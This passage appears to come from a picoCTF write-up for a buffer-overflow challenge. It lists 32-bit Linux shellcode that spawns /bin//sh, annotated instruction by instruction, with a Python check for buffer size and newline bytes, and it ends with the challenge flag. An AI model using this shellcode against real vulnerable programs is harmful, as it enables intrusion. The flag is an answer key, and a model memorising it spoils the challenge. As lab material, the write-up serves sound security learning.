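Before sending shellcode to a program like this, it is worth checking two things: that it fits in the buffer, and that it contains no newline byte, because gets() stops reading at the first newline. A small Python sketch with the bytes used above, split per instruction (the names fits and has_newline are mine):

```python
BUFSIZE = 148  # from vuln.c

shellcode = (
    b"\x31\xc0"              # xor  eax,eax
    b"\x50"                  # push eax
    b"\x68\x2f\x2f\x73\x68"  # push 0x68732f2f  (//sh)
    b"\x68\x2f\x62\x69\x6e"  # push 0x6e69622f  (/bin)
    b"\x89\xe3"              # mov  ebx,esp
    b"\x89\xc1"              # mov  ecx,eax
    b"\x89\xc2"              # mov  edx,eax
    b"\xb0\x0b"              # mov  al,0xb
    b"\xcd\x80"              # int  0x80
    b"\x31\xc0"              # xor  eax,eax
    b"\x40"                  # inc  eax
    b"\xcd\x80"              # int  0x80
)

fits        = len(shellcode) <= BUFSIZE
has_newline = b"\n" in shellcode
print(len(shellcode), fits, has_newline)
```

The 0x0b byte in mov al,0xb is a vertical tab, not a newline, so gets() reads the whole payload.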

flag: picoCTF{shellc0de_w00h00_b766002c}
